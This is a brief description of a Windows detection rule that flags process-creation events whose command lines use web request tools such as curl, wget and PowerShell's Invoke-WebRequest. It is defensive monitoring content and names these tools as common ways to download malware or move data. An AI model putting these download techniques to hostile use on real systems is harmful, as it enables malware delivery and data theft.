This detection rule identifies potentially suspicious usage of web request commands and cmdlets within Windows environments, particularly those executed through command line and PowerShell. The focus is on specific commands and their aliases that can be leveraged to download files from the web, which is a common technique used by adversaries to exfiltrate data or introduce malware. The detection is based on monitoring process creation events for command lines containing known web request command patterns like `curl`, `Invoke-WebRequest`, `wget`, and others. This rule also checks for associated Windows PowerShell cmdlets that perform web requests. Given the increased use of PowerShell in environments, detecting these commands is essential for identifying unauthorized data downloads and other malicious activities as part of attack execution tactics.